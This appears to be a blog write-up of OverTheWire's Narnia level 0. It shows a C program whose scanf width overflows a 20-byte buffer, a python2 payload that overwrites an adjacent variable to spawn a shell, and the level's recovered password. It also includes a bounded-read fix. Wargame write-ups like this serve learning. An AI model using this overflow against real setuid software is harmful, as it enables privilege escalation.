2019-10-02-OverTheWire narnia.md

File metadata and controls

77 lines (62 loc) · 1.54 KB
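| layout | title | date | categories | tags | series | series_index | comments | mathjax | copyrights |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| post | Narnia | 2019-10-02 00:00:00 +0800 | 安全 | game | OverTheWire | 3 | true | true | 原创 未完待续 |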

https://overthewire.org/wargames/narnia/

Each level is reached over ssh:

```bash
ssh -p 2226 [email protected]
```

Level 0 -> Level 1

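```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setreuid, geteuid */

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    /* Reads up to 24 characters plus a NUL into the 20-byte buf:
       this is the overflow the level is built around. */
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    /* Only reachable once the bytes after buf have been overwritten. */
    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}
```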

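As the source shows, there is a buf of size 20, and we need to overflow buf with our input in order to overwrite the value of val.

Let's start with a simple attempt: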

```text
$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAABCDE
buf: AAAAAAAAAAAAAAAAAAAABCDE
val: 0x45444342
WAY OFF!!!!
```

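Note that val is now 0x45444342, i.e. EDCB: the four bytes written past the end of buf, BCDE, are stored in little-endian order, so they read back reversed.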
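The first attempt reproduced on a modelled stack frame, next to the same read with a field width that fits the buffer. This is an added example, not part of the original post or of the OverTheWire source; the frame layout (val placed directly after buf, as the output above indicates) and the names `frame_init`, `frame_val`, `scan_as_narnia0` and `scan_bounded` are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   20                  /* char buf[20] in narnia0 */
#define FRAME_SIZE (BUF_SIZE + 4 + 4)  /* buf, val, spare bytes for the NUL */

/* Constructed model of the frame: val's four bytes directly follow buf. */
static void frame_init(unsigned char *f)
{
    memset(f, 0, FRAME_SIZE);
    memset(f + BUF_SIZE, 0x41, 4);     /* val = 0x41414141 */
}

/* Read val back the way a little-endian x86 target would. */
static uint32_t frame_val(const unsigned char *f)
{
    const unsigned char *v = f + BUF_SIZE;
    return (uint32_t)v[0] | (uint32_t)v[1] << 8 |
           (uint32_t)v[2] << 16 | (uint32_t)v[3] << 24;
}

/* Width from the level: up to 24 characters plus a NUL, 25 bytes in total. */
uint32_t scan_as_narnia0(const char *input)
{
    unsigned char f[FRAME_SIZE];
    frame_init(f);
    sscanf(input, "%24s", (char *)f);
    return frame_val(f);
}

/* Corrected width: sizeof(buf) - 1 characters, so the NUL still fits in buf. */
uint32_t scan_bounded(const char *input)
{
    unsigned char f[FRAME_SIZE];
    frame_init(f);
    sscanf(input, "%19s", (char *)f);
    return frame_val(f);
}

int main(void)
{
    const char *in = "AAAAAAAAAAAAAAAAAAAABCDE";   /* input from the first attempt */
    printf("%%24s -> val: 0x%08x\n", (unsigned)scan_as_narnia0(in));
    printf("%%19s -> val: 0x%08x\n", (unsigned)scan_bounded(in));
    return 0;
}
```

With the width set to one less than the buffer size, the trailing characters are left unread and val keeps its initial value.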

```text
/narnia$ python2 -c 'print "A"*20 + "\xef\xbe\xad\xde\x80"'
AAAAAAAAAAAAAAAAAAAAᆳހ
/narnia$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAAᆳހ
buf: AAAAAAAAAAAAAAAAAAAAᆳ�
val: 0xdeadbeef
$ cat /etc/narnia_pass/narnia1
eaa6AjYMBB
```